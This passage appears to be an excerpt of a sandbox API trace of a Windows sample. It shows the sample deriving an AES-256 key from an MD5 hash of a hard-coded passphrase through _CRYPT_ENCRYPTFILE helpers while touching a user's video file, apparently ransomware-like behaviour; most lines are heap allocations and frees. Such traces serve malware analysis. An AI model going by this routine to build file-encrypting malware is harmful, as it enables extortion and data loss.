hHeap=0x1780000) returned 1 [0104.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0104.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0104.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca790, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0104.696] CloseHandle (hObject=0x298) returned 1 [0104.696] FreeLibrary (hLibModule=0x772d0000) returned 1 [0104.697] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0104.697] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0e7ec70, ftCreationTime.dwHighDateTime=0x1d5e673, ftLastAccessTime.dwLowDateTime=0xc6aa11d0, ftLastAccessTime.dwHighDateTime=0x1d5e969, ftLastWriteTime.dwLowDateTime=0xc6aa11d0, ftLastWriteTime.dwHighDateTime=0x1d5e969, nFileSizeHigh=0x0, nFileSizeLow=0xca0e, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="38VodG.mp4", cAlternateFileName="")) returned 0x41ac780 [0104.697] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0104.697] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.697] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0104.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0104.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0104.743] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0104.744] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0104.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.744] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0104.744] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0104.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0104.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0104.744] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.744] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0104.745] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0104.745] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0104.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cae50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0104.745] CryptHashData (hHash=0x41ac040, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0104.745] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.745] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0104.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cada8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0104.745] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac040, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac140) returned 1 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0104.746] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0104.747] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb018 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb048 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadd8 [0104.747] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadf0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf10 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae20 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad90 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0104.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf28 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0104.748] PeekMessageW (in: lpMsg=0x144df54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df54) returned 0 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0104.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0104.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b90 [0104.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796ea8 [0104.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02b0 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0104.750] CryptDestroyHash (hHash=0x41ac040) returned 1 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0104.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0104.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0104.751] HeapFree (in: hHeap=0x1780000, 